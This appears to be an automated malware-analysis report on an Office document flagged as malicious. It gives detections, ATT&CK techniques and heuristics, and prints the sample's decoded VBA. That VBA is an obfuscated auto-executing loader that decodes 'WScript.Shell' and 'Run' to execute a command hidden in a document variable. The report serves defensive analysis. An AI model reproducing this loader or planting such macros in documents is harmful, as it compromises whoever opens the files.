MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains heavily obfuscated VBA macros, including auto-executing Document_Open and Workbook_Open subroutines. These macros utilize CreateObject and CallByName functions to execute a payload, likely a second-stage downloader. The obfuscation and auto-execution behavior are indicative of malware designed to download and run additional malicious content.
Heuristics 9
-
ClamAV: Xls.Malware.Valyria-6700361-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-6700361-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1753 bytes |
SHA-256: 0650c3fc78b6ede92aa2a8641eb10116e9647fdddd45e0ab413112892e7cffed |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function GHTSMIPLI() As String
Dim GHTSMIPLI = aGHTSMIPLI
POtvc dore(aGHTSMIPLI))
dCMK dd(a & vGHTSMIPLI
Opot("ard"))
Fep(aGHTSMIPLI & vGHTSMIPLI, 11))
End Function
Public Sub Document_Open()
Application.Run XE_("B4B8C2")
End Sub
Private Function GZLUICQHI() As String
Dim GZLUICQHI = aGZLUICQHI
POtvc dore(aGZLUICQHI))
dCMK dd(a & vGZLUICQHI
Opot("ard"))
Fep(aGZLUICQHI & vGZLUICQHI, 11))
End Function
Public Function XE_(ByVal DMN_ As String)
Dim D_ As String
Dim GD_ As Long
For GD_ = 1 To Len(DMN_) Step 2
Dim S_ As Long: S_ = CLng(Chr(38) & Chr(72) & Mid(DMN_, GD_, 2))
D_ = D_ & Chr(S_ - 99)
Next
XE_ = D_
End Function
Private Function UGVICCSFJ() As String
Dim UGVICCSFJ = aUGVICCSFJ
POtvc dore(aUGVICCSFJ))
dCMK dd(a & vUGVICCSFJ
Opot("ard"))
Fep(aUGVICCSFJ & vUGVICCSFJ, 11))
End Function
Sub Workbook_Open()
QU_
End Sub
Private Function VDTRIJGOE() As String
Dim VDTRIJGOE = aVDTRIJGOE
POtvc dore(aVDTRIJGOE))
dCMK dd(a & vVDTRIJGOE
Opot("ard"))
Fep(aVDTRIJGOE & vVDTRIJGOE, 11))
End Function
Sub QU_()
CallByName CreateObject(XE_("BAB6C6D5CCD3D791B6CBC8CFCF")), XE_("B5D8D1"), VbMethod, XE_(ActiveDocument.Variables("MWZQIIWY").Value), 0, True
End Sub
Private Function HDKANADOS() As String
Dim HDKANADOS = aHDKANADOS
POtvc dore(aHDKANADOS))
dCMK dd(a & vHDKANADOS
Opot("ard"))
Fep(aHDKANADOS & vHDKANADOS, 11))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.